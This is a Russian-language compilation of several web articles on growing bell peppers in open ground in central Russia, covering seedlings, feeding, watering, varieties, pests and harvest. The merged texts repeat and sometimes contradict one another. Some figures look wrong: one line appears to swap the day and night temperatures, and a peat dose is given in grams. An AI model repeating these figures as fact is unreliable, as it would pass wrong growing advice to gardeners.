4 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Все о выращивании перца в открытом грунте в средней полосе

Болгарский перец — выращивание и уход в открытом грунте

Болгарский перец называют ещё сладким, он богат полезными веществами и витаминами, различными расцветками, сочный и вкусный.

Процесс выращивания сладкого перца обладает своими особенностями, так как перец теплолюбивый овощ. Чтобы получить хороший урожай перцев, необходимо обладать знаниями и определенными навыками.

Рассмотрим выращивание болгарского перца из семян, из рассады, особенности ухода при выращивании в открытом грунте, борьба с вредителями и болезнями, когда производить сбор урожая.

Перец растение короткого светового дня, и если световой день менее 12 часов, перец раньше начинает плодоносить.

Высаживать перец семенами в открытый грунт нецелесообразно даже в южных районах, потому что необходимо дождаться пока прогреется почва, плодоносить перец начнет позже и не долго. Поэтому в основном сладкий перец выращивают рассадным способом.

Выращивание рассады болгарского перца

При выращивании рассады в домашних условиях, семена перца высевают в феврале, чтобы до пересадки в грунт растениям было 90-100 дней. Перец плохо переносит пикирование, поэтому старайтесь сразу сеять семена в отдельных торфяных горшочках диаметром 8-10 см.

Большие горшочки использовать нет надобности из-за медленного развития корневой системы перцев.

Почва для рассады

Подходит лёгкий и рыхлый субстрат состоящий из перегноя, смешанного с 1 частью земли и 1 частью песка. Добавить на 1 кг субстрата 1 ст. л. древесной золы.

Перед посевом провести обработку семян перца – выдержать семена в горячей воде + 50 градусов в течении 5 часов. Затем семена поместите во влажную ткань для прорастания на 2-3 дня, температура в помещении должна быть + 20 градусов. После такой предпосевной подготовки, всходы появляются уже на следующий день после посева.

Семена посеянные в стаканчики, полить и накрыть полиэтиленовой пленкой или стеклом. До появления всходов держать горшочки в теплом месте с температурой + 22 градуса. После появления всходов пленку снять и рассаду перенести в помещение с температурой 26-28 градусов днём и 10-15 градусов ночью.

Ухаживая за рассадой перцев не допускайте пересыхания почвы, но и излишний полив не рекомендуем.

Полив производите теплой водой +30 градусов, от холодной воды вырастет хилая рассада, растения могут заболеть. Воздух в помещении не должен быть слишком сухим, защищайте растения от сквозняков и опрыскивайте растения.

Зимой в феврале, рассада требует дополнительного освещения, чтобы световой день был с 7 утра до 9 вечера.

Первая подкормка проводиться в фазе появления 2 настоящих листочков следующим раствором: в 10 л воды развести 5 г аммиачной селитры, 10 г калийных удобрений, 30 г суперфосфата.

Вторая подкормка проводиться через 14 дней после первой минеральными удобрениями в 2 раза большей пропорции, чем первая.

Третья подкормка проводиться за 2 дня до высадки рассады в грунт. Увеличивают в растворе дозу калийных удобрений до 70 г на 10 л воды.

За несколько недель до высадки рассады перца, проводят закаливание растений, вынося на свежий воздух на несколько часов. Следите чтобы температура воздуха была не ниже +13 градусов, рассада может погибнуть.

Выбор места для посадки болгарского перца

Подберите участок на огороде, где до этого росли огурцы, лук, тыква, морковь, капуста, кабачки, различные сидераты. Перец плохо растет и плодоносить если посадить на участок где до этого росли картофель, баклажаны, томаты, перец.

Лучше всего перец растёт на лёгких почвах. Участок под посадку приготовьте заранее, осенью внести по 50 г фосфорных и калийных удобрений на м 2 , глубоко перекопать. Весной в верхний слой почвы внести 40 г аммиачной селитры на м 2 участка.

Перед высадкой рассады в открытый грунт, провести обеззараживание почвы таким раствором: в 10 л воды развести 1 ст л медного купороса.

В конце мая рассаду перца высаживают в открытый грунт с расстоянием 40х40 см между растениями. В пленочную теплицу рассаду высаживают в конце апреля.

Высаживать рассаду следует на такую же глубину, с какой росли растения в стаканчиках или ящиках. Не обнажайте корни, но и старайтесь не прикапывать прикорневую шейку.

Перец не любит холодную почву, устройте для перца высокие грядки, поднятые на 25 см, чтобы получить хороший урожай перцев.

Внимание: перец подвержен переопылению, поэтому разные сорта перцев высаживайте как можно дальше друг от друга или разделяйте с помощью высокорослых насаждений томатов, кукурузы, подсолнуха.

Видео – Перцы, секрет богатого урожая

Уход за перцем в открытом грунте

Необходимо своевременно проводить поливы, подкормки, подвязки и прополки посадок перца.

Подкормка перцев в открытом грунте

В течении сезона необходимо провести 3-4 подкормки куриным помётом разбавленным с водой 1 х 10. Такие подкормки чередуйте внекорневую, используя опрыскивание нитрофоской (1 ст. л. на 10 л. воды).

Недостаток калия приведет к скручиванию листьев, появлению засыхающей каймы. Но перец плохо переносит изобилие хлористого калия.

При недостатке азота листья перца мельчают, приобретают матовый сероватый оттенок. Если излишек азота происходит сбрасывание цветков и завязей.

Нехватка фосфора – листья с нижней стороны становятся насыщенно фиолетовыми, прижимаются к стеблю растений и подымаются вверх.

При недостатке магния листья становятся мраморной окраски.

Видео — КАК ПРАВИЛЬНО ФОРМИРОВАТЬ ПЕРЕЦ. УХОД И ПОДКОРМКИ.

Проводите пасынкование в жаркую и влажную погоду, удаляя боковые побеги, особенно нижние. И наоборот, когда жаркая и сухая погода перец не пасынки, листья в этот период предохраняют растения от испарения влажность почвы.

Обрезка перца

В период вегетации проводят обрезку самых длинных побегов, особенно удаляют все отростки ниже развилки главного стебля, а также все ветки идущие внутрь растения. Проводите обрезку раз в 10 дней и после сбора плодов.

Для привлечения насекомых- опылителей опрыскать посадки перца сахарным или медовым раствором: 100 г сахара, добавить 2 г борной кислоты, все развести в литре горячей воды.

Мульчирование перца перепревшей соломой ( слой 10 см), сократит частоту поливов до 1 раза в 10 дней.

Своевременно проводите подвязку растений, лучше сделать это после окучивания.

Вредители и болезни перца

Такие вредители как слизни, совка, тля, белокрылка, медведка и колорадский жук способны нанести вред растениям. Необходимо 3 раза за сезон опылять перец древесной золой.

Распространенные болезни сладкого перца – фитофтороз, Септориоз, макроспориоз, вершинная гниль, белая гниль, черная ножка.

В борьбе с медведкой, перед высадкой в грунт, лунки для посадки наполнить луковой водой (500 г луковой шелухи настоять в 10 л воды в течении 3 дней).

При поражении тлей обработать растения раствором: 1,5 л молочной сыворотки развести в 10 л воды. После обработки перетрусите золой.

Сбор урожая болгарского перца

Когда перцы приобретают размер и цвет соответствующий созреванию, приступайте к сбору урожая, срезая овощи с плодоножкой. Созревание перца начинается с начала августа, и продолжается до первых заморозков.

Как вырастить перец в открытом грунте в Средней полосе

Выращивание перца в открытом грунте в Средней полосе России сопряжено с определенными и весьма серьезными трудностями. Чтобы добиться высокой урожайности этой культуры в неоптимальных для нее условиях, нужно хорошо знать ее биологические особенности и предпочтения. Об этом и пойдет речь в статье.

Содержание статьи:

Подробнейшую инструкцию по посадке перца на открытую грядку вы найдете тут. Хочу обратить ваше внимание, что первые 7-10 дней после высадки перчики нуждаются в самой тщательной заботе. В ряде источников можно встретить рекомендацию не поливать растения в этот период (якобы это стимулирует корни расти вглубь в поисках воды). Однако я категорически не согласна с таким варварским отношением к бедным переселенцам.

Во-первых, пока растения полностью не адаптировались к новым более жестким условиям произрастания, корни у них расти не будут. А для более быстрой адаптации вода им просто необходима.

Во-вторых, если рассада выращивалась в торфяных горшочках или таблетках, то для их более быстрого размокания грядку с перцами можно и нужно часто поливать. Иначе корням перцев будет просто некуда развиваться.

В-третьих, если на улице установилась жара, то без ежедневного полива вообще не обойтись, — без него растения будут болеть и могут даже погибнуть. Кроме того, в жаркую погоду высаженную рассаду желательно притенять (особенно в полуденные часы).

Уход за перцем в открытом грунте

Если вы высаживали рассаду перца уже с первыми бутонами, то их лучше удалить

Пока корешки у высаженной рассады не окрепли, первые цветки лучше обрывать, в противном случае растения пустят все силы на формирование первых завязей в ущерб закладки новых бутонов.

Примерно через две недели после посадки растения перца нужно осторожно подвязать к шпалере либо к заранее вкопанным колышками. Хотя низкорослые перцы можно и не подвязывать, я считаю, что это все-таки нужно сделать по двум причинам:

  • чтобы растения не гнулись и не ломались под тяжестью зреющего урожая (когда дело касается этой культуры, для улучшения устойчивости лучшее не использовать более глубокую посадку);
  • чтобы улучшить условия освещенности на грядке и облегчить циркуляцию воздуха в междурядьях.

Перец категорически не выносит резких перепадов температуры и лучше всего растет при +20. 28 ночью и при +15. 18 днем. В средней полосе России перцы, выращиваемые в открытом грунте, первый месяц держат под пленочным укрытием. Чтобы растения не сварились в июньскую жару, в солнечные дни пленку полностью убирают, а вечером водворяют на прежнее место.

В любом случае посадки перца под пленочным укрытием нужно ежедневно проветривать. При этом если погода стоит прохладная и ветреная, то пленку поднимают только с южной или восточной стороны.

С середины июля пленку, как правило, снимают совсем, поскольку взрослым плодоносящим перчикам не страшны понижения температуры до +15 градусов (хотя это и вредит их урожайности).

Опасны для перца как низкие, так и высокие температуры. При +10 градусах и ниже развитие растений этой культуры останавливается, а при +30. 32 градусах не происходит опыления, а уже образовавшиеся цветки и завязи опадают.

Оптимальная температура почвы для перца — +18. 22 градуса.

Кстати, а вы знали, что за вегетационный период на одном растении перца появляется от 30 до 90 цветков, при этом лишь треть из них превращается в полноценные плоды?

Перец относится к самоопыляющимся растениям, однако сорта с мелкими плодами могут переопыляться с помощью насекомых-помощников — муравьев, клопов, пчелок и шмелей.

Пыльца у перца тяжелая, клейкая и поэтому может распространяться на расстояние не более одного метра. Для стимуляции плодообразования можно использовать искусственное опыление — в сухие теплые часы слегка встряхивать цветущие кустики путем постукивания по их стеблям.

В неудачное лето (слишком жаркое или, наоборот, холодное) завязывание плодов на перцах улучшают с помощью специальных препаратов вроде Завязи. Кстати, во время массового цветения кустики перца также полезно окучивать.

О том, как правильно формировать перец, выращиваемый в открытом грунте, хорошо рассказано в видео.

Полив перца в открытом грунте

Мульча нужна для того, чтобы сократить потребность в поливах и обеспечить растениям хорошие условия для развития

Основной объем корней у перца залегает в верхнем слое плодородного грунта, поэтому неудивительно, что растения этой культуры мгновенно реагируют как на недостаток влаги в почве, так и на ее переувлажнение.

Дефицит воды приводит к повышению содержания солей в почвенном растворе, что, в свою очередь, вызывает у кустиков перца одревеснение стеблей, измельчение плодов, а также осыпание листьев и завязей.

При этом своевременный и обильный полив дает прибавку в урожайности в 300-400%.

Перец поливают от 1 до 3 раз в неделю (в зависимости от погодных условий), рано утром либо вечером, расходуя по 1,5-2 литра ТЕПЛОЙ (+25 градусов) водички под каждый кустик (10-12 литров / квадратный метр грядки). В результате этого почва должна промокнуть на глубину не менее 15 сантиметров.

Полив осуществляют исключительно под корень так, чтобы капельки влаги не оседали на листьях и цветах. Чтобы предупредить образование почвенной корки, перед водными процедурами промежутки между растениями и междурядья нужно немного взрыхлить (только аккуратно и неглубоко, чтобы не повредить поверхностные корешки). А как только вода полностью впитается, рыхление также желательно повторить.

За 1,5-2 недели до окончательной уборки урожай полив полностью прекращают.

Если у вас нет возможности поливать перец так часто, то посадки этой культуры можно замульчировать перепревшей соломой, срезанными сорняками (естественно, без семян), скошенной и подвяленной травой, лузгой подсолнечника, опилками, опавшими листьями, компостом или торфом (слоем от 7 до 10 сантиметров с обновлением раз в месяц).

Благодаря этому простому агроприему, можно снизить частоту поливов до одного раза в 8-10 дней. Мульча также препятствует уплотнению грунта на грядке, защищает корни растений от перегрева и переохлаждения, а также не дает расти сорнякам.

Подкормка перца в открытом грунте

Перцы особенно нуждаются в дополнительном питании именно в период массового плодоношения

При выращивании перца в открытом грунте растениям нужно давать регулярные подкормки.

Почву на грядке с этой культурой поливают питательными растворами каждые две — три недели, всего 3-4 раза за весь период вегетации. Как правило, первую подкормку совмещают с первым основательным рыхлением и делают через пару недель после высадки перечной рассады. Также обязательно предоставьте растениям дополнительное питание в самом начале плодоношения, а также во время массового формирования плодов. А чтобы плоды были крупными и сладкими, в этот период в удобрении должны непременно присутствовать кальций и калий.

Минеральные и органические подкормки лучше чередовать. При использовании «минералки» в 10-литровом ведре растворяют 15-20 граммов аммиачной селитры, 40-50 граммов суперфосфата и 20 граммов хлористого калия (или столовую ложку любого комплексного минерального удобрения). Под каждое растения перца вносят по одному литру питательной смеси.

Из органики перцу больше всего нравятся растворы коровяка (1:10), куриного помета (1:20) или настой крапивы (1:10). При желании на 10 литров смеси можно также добавить одну столовую ложку нитрофоски и дать ей настояться в течение трех — четырех дней. Вместо нитрофоски можно также взять по 1-2 горсти древесной золы. Норма расхода получившегося настоя под одно растение — от 0,5 до 1 литра раствора.

Напомню, что после каждой подкормки посадки перца в открытом грунте слегка поливают чистой теплой водой, а как только она впитается, почву непременно рыхлят.

А еще перцы хорошо отзываются на подкормку углекислым газом. Для этого ведро на 2/3 его объема заполняют свежим куриным пометом, доливают воды и ставят емкость под пленочное укрытие. Через некоторое время помет начинает разлагаться и выделять углекислый газ, который очень благотворно влияет на рост и развитие перцев. При этом температура воздуха под пленкой повышается на 3-4 градуса, что очень важно для этого тропического растения, выращиваемого в Средней полосе России.

Перец можно подкармливать и по листьям, то есть внекорневым способом. Чтобы приготовить питательный раствор, на 10 литров воды добавляют 1 столовую ложку нитрофоски.

В качестве профилактической меры против болезней и вредителей растения перца можно опудривать просеянной древесной золой. Обработки лучше проводить по росе либо после некорневых подкормок (всего 2-3 раза за сезон).

Уборка урожая

Плоды у перца зреют достаточно медленно — в зависимости от погоды и сортовой принадлежности фаза технической спелости наступает только через 30-45 дней после появления завязи. После этого требуется еще от 25 до 35 дней, чтобы плоды достигли биологической зрелости.

В целом, чем чаще снимать плоды, тем большее количество питательных веществ будут получать оставшиеся на кустах завязи. В связи с этим первые перчики желательно убрать еще зелеными, что сильно повысит общую урожайность перечной грядки. В дальнейшем плоды можно собирать уже по мере их полного созревания, а после каждого сбора давать растениям дополнительную подкормку.

В конце июля — в начале августа у перцев, выращиваемых в открытом грунте в Средней полосе России, нужно убрать все цветки. Это способствует лучшему дозреванию оставшихся перчиков и увеличивает их размеры.

А чтобы не допускать ошибки при выращивании перца на открытой грядке, предлагаю посмотреть небольшое видео.


Таковы основные премудрости и хитрости выращивания перца в открытом грунте. Если вам понравилась эта статья, то подписывайтесь на мой блог, чтобы не упустить выхода новых материалов!

Перец: особенности ухода, посадки и выращивания

В природе насчитывают более 2 000 видов перцев, а их родина — Центральная Америка. В этой статье я расскажу про сладкий перец, который называют еще болгарским. «Мексиканец» попал в Европу в 15 веке и кружными путями, через Испанию, Турцию, Иран, в конце концов проник в наши края. Здесь он серьезно прижился, несмотря на теплолюбивость и капризный нрав — ведь достоинств у перца хоть отбавляй! Он не только богат яркими расцветками, придающими блюду праздничный вид, не только вкусен и сочен, но и является бесценным кладезем витаминов. По этой части с ним сравнится редкий овощ или фрукт.


Поспевает сладкий перец

Но чтобы получить хороший урожай, придется постараться. Этот «южанин» любит теплую погоду, поэтому в средних широтах выращивают его по большей части рассадой и в теплицах.

Перец — растение короткого дня, то есть если световой день длится менее 12 часов, перец раньше начинает переходить к плодоношению и, что немаловажно, дает более стабильные и высокие урожаи.

Сорта перца

Прежде чем сажать перец, необходимо определиться с выбором сорта, и тут все зависит не только от ваших вкусовых предпочтений, но и от назначения будущих плодов. Так, если вы намерены употреблять перцы преимущественно в свежем виде, лучше отдать предпочтение более толстостенным и крупноплодным сортам, например ‘Калифорнийское чудо’, ‘Гладиатор‘, ‘Винни-Пух’ или ‘Подарок Молдовы’. Если же основное назначение — консервация, то выбирайте мелкоплодные сорта, относящиеся к «сибирской» серии: ‘Купец’, ‘Ермак’, ‘Виктория’ и другие.

Один из самых скороспелых сортов перца, плоды созревают рано и дружно. После первого урожая перец сорта ‘Ермак’ снова зацветает и дает хороший второй урожай. Очень крупные плоды, масса которых доходит до 250 г. Урожайность сорта — 12-15 кг/м².

  • ‘Гладиатор’

Среднепоздний голландский сорт с большими ярко-желтыми плодами, вкусными, с толстой мякотью. Толщина стенок плодов доходит до 13 мм, вес отдельных экземпляров достигает 380-400 г, а урожайность 10-12 кг/м².

  • ‘Медаль’

Раннеспелый сорт, отличающийся растянутым плодоношением. Он постоянно цветет и образует новые завязи. Плоды сорта Медаль достаточно крупные — до 150 г, в биологической спелости ярко-красные по цвету, с толщиной стенки около 8-13 мм. Урожайность сорта достигает 16 кг/м².

  • ‘Йова’

Один из наиболее скороспелых российских сортов, начиная с появления всходов и до момента технической спелости проходит около 95-100 дней. Очень урожайный, сочный и толстостенный. Урожайность до 14 кг с одного квадратного метра, а масса некоторых его плодов превышает 250 г. Неприхотлив и дает отличные урожаи даже на тяжелых почвах.



  • ‘Калифорнийское чудо’

Сорт среднеранний, масса плода до 400 г, а толщина стенки до 12 мм.

  • ‘Черный кардинал’

Относится к поздним итальянским сортам, имеет необычайно красивые черно-фиолетовые плоды (в технической спелости) переходящие в красный (в биологической спелости). С 1 м² до 10 кг урожая.

  • ‘Виктория’

Сорт среднеранний, плоды по массе относительно небольшие — до 110 г, конусовидные, слаборебристые, длиной около 7-13 см, толщина стенок 7-8 мм. Урожайность 9-10 кг/м².

Обширный ассортимент семян сладкого перца вы можете найти в нашем каталоге. Смотреть подборку семян сладкого перца:

Выращивание рассады перца

Если у вас нет теплицы, то семена перца необходимо высевать в феврале, чтобы до момента пересадки в мае растения были в возрасте 90-100 дней. Перец плохо переносит пикировку, поэтому старайтесь сразу сеять семена в индивидуальные торфяные горшочки диаметром около 8-10 см. Использовать большие горшки не имеет смысла из-за медленного развития его корневой системы.


Торфяные горшочки для перца — хороший вариант

Субстрат для выращивания перца рассадным способом должен быть легкий и рыхлый и состоять из 2 частей перегноя, смешанного с 1 частью песка и 1 частью земли. На 1 кг такой смеси необходимо добавить столовую ложку золы.

Семенам перца необходима предпосадочная обработка — их нужно держать до набухания на протяжении пяти часов в воде, температура которой около +50°С. После этого их необходимо поместить для наклевывания во влажную ткань на 2-3 дня, температура в помещении около +20°С. Проведя такую несложную предпосадочную подготовку семян, вы получите всходы уже буквально на следующий день после посева.

Посеянные семена перца необходимо хорошенько полить, а сразу после этого накрыть полиэтиленовой пленкой либо стеклом. До появления всходов они могут находиться в любом теплом (около +22°C) месте, освещение при этом неважно, можно и в темноте. После появления всходов оптимальная температура для выращивания рассады днем около +26. +28°С, ночью около +10. +15°С.

Не стоит баловать перцы излишними поливами, это может только повредить им — вызвать заболевание черной ножкой. Но старайтесь не допустить и пересыхания субстрата. Вода для полива должна быть теплой — около +30°С, от чрезмерно холодной рассада будет хилой, заболеет и даже может погибнуть. Не забывайте следить и за воздухом в помещении, в котором выращивается рассада, он должен быть не слишком сухим. Опрыскивайте растения, а само помещение хорошенько проветривайте, не забывая защищать от сквозняков.

Рассада перца требует дополнительного освещения. На протяжении февраля месяца ее необходимо освещать с 7 часов утра до 9 вечера. Перед высадкой рассада нуждается в закаливании, постепенному приучению к лучам солнца, более низким температурам, ветру и дождю. Для этого растение выносят на свежий воздух, понемногу увеличивая время его пребывания там. Во время закаливания следите за погодными условиями, нельзя допустить чтобы рассада перца попала под заморозок либо пониженную температуру — для перца это ниже +13°С.

Посадка перца

Лучшие предшественники для перца: лук, огурцы, тыква, капуста после сидератов, кабачок и морковь. Плохие предшественники: картофель, перец, помидоры, физалис и баклажан.

Для выращивания лучше всего подходят легкие почвы. Почву под перец лучше приготовить заранее — за год, внеся под предшественника 5 кг органических удобрений на квадратный метр, а осенью по 50 г калийных и фосфорных удобрений под глубокую перекопку. Весной на участок — в верхний слой грунта, вносим 40 г аммиачной селитры. За пять дней до того как пересаживать рассаду перца на постоянное место, займитесь обеззараживанием почвы, делать это необходимо с помощью раствора — на ведро воды добавляем столовую ложку медного купороса.

Высаживают рассаду в открытый грунт в конце мая — середине июня, по схеме 40х40 см. В пленочную неотапливаемую теплицу рассаду перца высаживают в начале апреля, а в туннельные укрытия — в конце мая.


Высаживание перца

Помещать саженцы в лунки старайтесь на такую же глубину, на которой растения росли в рассадном ящике, не обнажая корни и не прикапывая его прикорневую шейку. Перец не любит холодного грунта, и если вы хотите получить серьезный урожай, устройте ему высокие грядки, которые необходимо поднять на 25-55 сантиметров.

Помните, перец сильно подвержен переопылению, поэтому если вы сажаете на своем участке несколько его сортов, старайтесь расположить их на максимальном удалении друг от друга и по возможности разделяйте их между собой с помощью посадок высокорослых помидоров, кукурузы и подсолнечника.

Выращивать перец высадкой семян в открытый грунт нецелесообразно даже в южных регионах. Сеять придется все равно поздно, когда почва прогреется, растение будет развиваться медленнее, первые плоды поспеют позже, да и срок плодоношения перца окажется существенно короче.

Уход за перцем

Уход за перцем состоит из своевременных поливов, подвязок, прополок и подкормок. Первую подкормку рассады перца необходимо провести в фазе 1-2 настоящих листиков, для чего в 1 л воды смешивают 0,5 г аммиачной селитры, 1 г калийных удобрений и 3 г суперфосфата. Вторая подкормка через 2 недели после первой, дозу минеральных удобрений для нее необходимо удвоить.

Эффективны подкормки рассады перца специальным настоем крапивы, для приготовления которого необходимо взять 1 часть крапивы и 10 частей воды — настаиваем 2 дня. Последнюю подкормку нужно провести за 2 дня до того, как вы намерены высадить рассаду на постоянное место, при этом дозу калийных удобрений увеличиваем до 7 г на 1 л воды. За сезон нужно произвести около 3-4 подкормок перца куриным пометом — 1:10, чередуя такие подкормки с внекорневыми, для которых нужно использовать минеральные удобрения, например нитрофоску (столовая ложка на ведро воды).


Грядка перцев

При недостатке калия листочки перца скручиваются и на них появляется засыхающая кайма. Но с калием необходимо быть осторожным — перец не переносит изобилие хлористого калия. Если растению недостает азота, его листья становятся матовыми и, приобретая сероватый оттенок, постепенно мельчают. Когда недостает фосфора, нижняя сторона листочков перца становится насыщенно фиолетовой, а сами листья прижимаются ближе к стволу растения и поднимаются вверх. Если недостает магния, листики приобретают мраморную окраску, а излишек в почве азота приводит к сбрасыванию завязей и цветков перца.

В жаркую и влажную погоду обязательно необходимо проводить пасынкование (удаление боковых побегов), особенно это касается нижних пасынков, и наоборот, если стоит жаркая, но сухая погода, растения не пасынкуют, поскольку листовая масса отлично предохраняет от испарения влажность почвы. Опытные овощеводы советуют удалять центральный цветок на растении, растущий из первого разветвления, это поспособствует повышению урожая.

В период вегетации перцы необходимо несколько раз обрезать, стараясь укорачивать самые длинные побеги и добиться отсутствия затененных ветвей. Обязательно удаляйте все отростки перца ниже главной развилки его стебля, а также ветки внутри кроны. Обрезку необходимо производить раз в десять дней и после сбора плодов. Одновременно с обрезкой производят и обработку почвы.

Постарайтесь привлечь в огород насекомых-опылителей, для этого во время цветения опрыскивайте растения сахарным раствором: на литр горячей воды 100 г сахара и 2 г борной кислоты. Отличный результат дают подкормки перца жидкими органическими удобрениями.

Полезно мульчировать перец перепревшей соломой — слой около 10 см, благодаря чему можно сократить частоту поливов, сведя их до раза в 9-10 дней. Своевременный уход за растениями перца заключается и в подвязке растений. Производить подвязку необходимо после окучивания и мульчирования.

Вредители и болезни

Наиболее распространенные болезни перца: фитофтороз, белая гниль, макроспориоз, вершинная гниль, септориоз, черная ножка. Больше других перцу причиняют вред слизни, белокрылка, совка, тля, колорадский жук и медведка. Для защиты перца от повреждения медведкой за час до высадки его рассады предварительно сделанные лунки необходимо наполнить водой. Высадив рассаду перца, опять распылителем опрыскать посадки. За сезон 3 раза растения перца необходимо опылять с помощью древесной золы — лучше по росе. Это также поможет защитить их от вредителей.

Если вы заметите на рассаде перца тлю, обработайте перец с помощью сыворотки — полтора литра на ведро воды. После проведения данной процедуры припудрите растения просеянной древесной золой.

Можно ли вырастить перец в открытом грунте в средней полосе?

Добавление статьи в новую подборку

В средней полосе России не самые благоприятные условия для выращивания сладкого перца. Тем не менее многим овощеводам удается собирать вполне хороший урожай. Хотите узнать, как они это делают? Прочтите нашу статью.

Отсутствие теплицы на участке для многих дачников становится решающим фактором в решении отказаться от выращивания болгарского перца. Но если вы истинный огородник, вас такая мелочь не должна останавливать. Наши подсказки помогут выбрать лучшие сорта и гибриды сладкого перца, а также обеспечить оптимальные условия для его выращивания в открытом грунте.

Сорта перца для открытого грунта

Итак, каким же должен быть сорт, чтобы условия открытого грунта его не «пугали»? Первый важный критерий – холодостойкость. Второй – «умение» быстро наращивать урожай в благоприятный период, который в средней полосе длится совсем не долго (это то, что ученые называют дружной отдачей урожая).

Хорошо себя показали в непростых климатических условиях (когда в конце мая – начале июня дневная температура колеблется в пределах 15-22°С, а ночная понижается до 8°С) гибриды Минотавр F1, Снегопад F1 и Афина F1. Они довольно стойко переносят перепады температур, хотя и замедляют рост. В благоприятный период, в июле-августе, когда температура становится более комфортной, они довольно интенсивно наращивают вегетативную массу, что способствует появлению завязей и росту плодов.

Еще один существенный критерий, от которого зависит, быть урожаю или нет – скороспелость сорта. Ведь крайне важно, чтобы перец успел сформировать плоды в биологической стадии созревания в открытом грунте. Таким критериям отвечают сорта Винни-Пух, Здоровье и Медаль. Их первые плоды, как правило, начинают созревать в открытом грунте уже в 20-х числах августа.

Гибриды Минотавр F1, Снегопад F1, Афина F1

Гибриды Минотавр F1, Снегопад F1 и Афина F1 прекрасно подходят для консервирования и употребления в свежем виде, но совершенно не годятся для фаршировки из-за своей хоботовидной формы. Перец сортов Винни-Пух, Здоровье и Медаль, наоборот, маленький и компактный, его удобно укладывать в банки.

Выбор места для посадки

Перцы любят свет, поэтому место на участке, где им предстоит расти, должно быть хорошо освещено в течение всего дня. Осмотрите свой участок. Если на нем есть горки и возвышенности – это идеальные места для высадки рассады перца (почва там прогревается гораздо лучше, чем не пологих участках). Только учтите, с северной стороны построек посадки должны быть защищены от холодных ветров (например, живой изгородью или забором). А вот места под деревьями для перца совершенно не годятся.

Подготовка почвы

Если почва на вашем участке не очень плодородная, под осеннюю перекопку внесите перегной или компост из расчета от 4 до 15 кг/кв.м, а также суперфосфат (80-100 г/кв.м) и хлористый калий (15-25 г/кв. м). Если почва достаточно тяжелая, добавьте торф (15-25 г/кв. м), перепревшие опилки (1 ведро на 1 кв.м) или песок (4-5 ведер на 1 кв.м).

Высадка рассады

Итак, место для посадки выбрано, грядка подготовлена, рассада подходящих сортов перца ждет своего часа на подоконнике. Пока она немного подрастет, можно проделать еще одну операцию, благодаря которой получить гарантированный урожай будет легче.

Над будущей грядкой соорудите простейший каркас из дуг шириной примерно 70 см (это можно сделать как осенью, так и ранней весной, когда земля немного оттает). Материалом для них могут послужить как толстый металлический прут, так и прутья ивы. Высота каркаса – примерно 70 см. В конце марта – начале апреля на каркас натяните пленку.

Пленочное укрытие для рассады перцев

Примерно с 10 апреля в оттаявшую почву можно высевать холодостойкие зеленные культуры с коротким периодом вегетации (редис, кресс-салат, листовой салат, укроп). В 20-х числах мая можно убирать урожай. К этому времени почва хорошо прогреется, и вам останется внести азотные удобрения (300 г/кв.м), перекопать землю в парнике и высадить рассаду перца (в средней полосе это обычно делают с 25 мая по 5 июня).

Уход за перцами

Не торопить снимать пленку с вашей импровизированной теплицы. Оставьте ее хотя бы до 20 июня. Что касается ухода за посадками в это время, то он сводится к поливам, внесению удобрений и проветриванию укрытия. Проветривать перец следует только в солнечную погоду, подвернув края пленки на торцах сооружения.

Чтобы ускорить развитие растений в течение первых двух месяцев после высадки, 2-3 раза подкормите перец азотными удобрениями (из расчета 10-15 г/кв.м).

За время пребывания под укрытием (с конца мая до конца июня) перец хорошо укореняется, наращивает вегетативную массу и начинает зацветать. С приходом устойчивой теплой погоды необходимость в пленке отпадает, и ее можно смело убирать.

Сбор урожая

Плоды в открытом грунте средней полосы России начинают убирать в середине августа и заканчивают до первых заморозков, поскольку при нулевой температуре перцы портятся. Плоды следует снимать вместе с хвостиком, стараясь их не повредить. Хранить собранный урожай можно, уложив рядами в ящики в прохладном помещении с высокой влажностью. В таких условиях перец отлично себя чувствует в течение месяца.

Если ваш урожай достаточно большой, то консервирование или заморозка – тоже выход. Кстати, замороженный перец успешно сохраняет не только свои вкусовые качества, но и полезные свойства.

Каким будет урожай сладкого перца, во многом зависит от таланта овощевода и, конечно, его практических навыков. Однако мы не сомневаемся, что наши рекомендации помогут вам добиться максимального результата в этом нелегком занятии.

Как вырастить перец в открытом грунте в Средней полосе

Выращивание перца в открытом грунте в Средней полосе России сопряжено с определенными и весьма серьезными трудностями. Чтобы добиться высокой урожайности этой культуры в неоптимальных для нее условиях, нужно хорошо знать ее биологические особенности и предпочтения. Об этом и пойдет речь в статье.

Хочу обратить ваше внимание, что первые 7-10 дней после высадки перчики нуждаются в самой тщательной заботе. В ряде источников можно встретить рекомендацию не поливать растения в этот период (якобы это стимулирует корни расти вглубь в поисках воды). Однако я категорически не согласна с таким варварским отношением к бедным переселенцам.

Во-первых, пока растения полностью не адаптировались к новым более жестким условиям произрастания, корни у них расти не будут. А для более быстрой адаптации вода им просто необходима.

Во-вторых, если рассада выращивалась в торфяных горшочках или таблетках, то для их более быстрого размокания грядку с перцами можно и нужно часто поливать. Иначе корням перцев будет просто некуда развиваться.

В-третьих, если на улице установилась жара, то без ежедневного полива вообще не обойтись, — без него растения будут болеть и могут даже погибнуть. Кроме того, в жаркую погоду высаженную рассаду желательно притенять (особенно в полуденные часы).

Уход за перцем в открытом грунте

Если вы высаживали рассаду перца уже с первыми бутонами, то их лучше удалить

Пока корешки у высаженной рассады не окрепли, первые цветки лучше обрывать, в противном случае растения пустят все силы на формирование первых завязей в ущерб закладки новых бутонов.

Примерно через две недели после посадки растения перца нужно осторожно подвязать к шпалере либо к заранее вкопанным колышками. Хотя низкорослые перцы можно и не подвязывать, я считаю, что это все-таки нужно сделать по двум причинам:

  • чтобы растения не гнулись и не ломались под тяжестью зреющего урожая (когда дело касается этой культуры, для улучшения устойчивости лучшее не использовать более глубокую посадку);
  • чтобы улучшить условия освещенности на грядке и облегчить циркуляцию воздуха в междурядьях.

Перец категорически не выносит резких перепадов температуры и лучше всего растет при +20. 28 ночью и при +15. 18 днем. В средней полосе России перцы, выращиваемые в открытом грунте, первый месяц держат под пленочным укрытием. Чтобы растения не сварились в июньскую жару, в солнечные дни пленку полностью убирают, а вечером водворяют на прежнее место.

В любом случае посадки перца под пленочным укрытием нужно ежедневно проветривать. При этом если погода стоит прохладная и ветреная, то пленку поднимают только с южной или восточной стороны.

С середины июля пленку, как правило, снимают совсем, поскольку взрослым плодоносящим перчикам не страшны понижения температуры до +15 градусов (хотя это и вредит их урожайности).

